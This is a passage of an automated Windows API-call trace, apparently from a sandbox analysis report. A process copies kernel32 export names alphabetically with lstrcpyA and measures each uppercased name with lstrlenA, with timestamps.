lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0158.321] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0158.321] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0158.321] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0158.321] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0158.321] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0158.321] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0158.321] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0158.321] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0158.321] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0158.321] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0158.321] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0158.321] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0158.321] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0158.321] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0158.322] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0158.322] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0158.322] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0158.322] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0158.322] lstrlenA (lpString="BEEP") returned 4 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0158.322] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0158.322] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0158.322] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0158.322] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0158.322] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0158.322] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0158.322] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0158.322] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0158.322] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0158.322] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0158.322] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0158.322] lstrlenA (lpString="CANCELIO") returned 8 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0158.322] lstrlenA (lpString="CANCELIOEX") returned 10 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0158.322] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0158.322] lstrcpyA (in: lpString1=0x239e320, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0158.323] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0158.323] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0158.323] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0158.323] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0158.323] lstrlenA (lpString="CHECKELEVATION") returned 14 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0158.323] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0158.323] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0158.323] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0158.323] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0158.323] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0158.323] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0158.323] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0158.323] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0158.323] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0158.323] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0158.323] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0158.323] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0158.323] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0158.323] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0158.323] lstrcpyA (in: lpString1=0x239e320, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0158.324] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0158.324] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0158.324] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0158.324] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0158.324] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0158.324] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0158.324] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0158.324] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0158.324] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0158.324] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0158.324] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0158.324] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0158.324] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0158.324] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0158.324] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0158.324] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0158.324] lstrcpyA (in: lpString1=0x239e320, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0158.324] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0158.325] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0158.325] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0158.325] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0158.325] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0158.325] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0158.325] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0158.325] lstrlenA (lpString="COPYCONTEXT") returned 11 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0158.325] lstrlenA (lpString="COPYFILEA") returned 9 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0158.325] lstrlenA (lpString="COPYFILEEXA") returned 11 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0158.325] lstrlenA (lpString="COPYFILEEXW") returned 11 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0158.325] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0158.325] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0158.325] lstrlenA (lpString="COPYFILEW") returned 9 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0158.325] lstrlenA (lpString="COPYLZFILE") returned 10 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0158.325] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0158.325] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0158.325] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0158.325] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0158.325] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0158.326] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0158.326] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0158.326] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0158.326] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0158.326] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0158.326] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0158.326] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0158.326] lstrlenA (lpString="CREATEEVENTA") returned 12 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0158.326] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0158.326] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0158.326] lstrlenA (lpString="CREATEEVENTW") returned 12 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0158.326] lstrlenA (lpString="CREATEFIBER") returned 11 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0158.326] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0158.326] lstrlenA (lpString="CREATEFILEA") returned 11 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0158.326] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0158.326] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0158.326] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0158.326] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0158.326] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0158.326] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0158.327] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0158.327] lstrlenA (lpString="CREATEFILEW") returned 11 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0158.327] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0158.327] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0158.327] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0158.327] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0158.327] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0158.327] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0158.327] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0158.327] lstrlenA (lpString="CREATEJOBSET") returned 12 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0158.327] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0158.327] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0158.327] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0158.327] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0158.327] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0158.328] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0158.328] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0158.328] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0158.328] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0158.328] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0158.328] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0158.328] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0158.328] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0158.328] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0158.328] lstrcpyA (in: lpString1=0x239e320, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0158.328] lstrlenA (lpString="CREATEPIPE") returned 10 [0158.328] lstrcpyA (in: lpString1=0x239e320, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0158.328] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0158.328] lstrcpyA (in: lpString1=0x239e320, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0158.328] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0158.328] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0158.328] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0158.328] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0158.328] lstrlenA 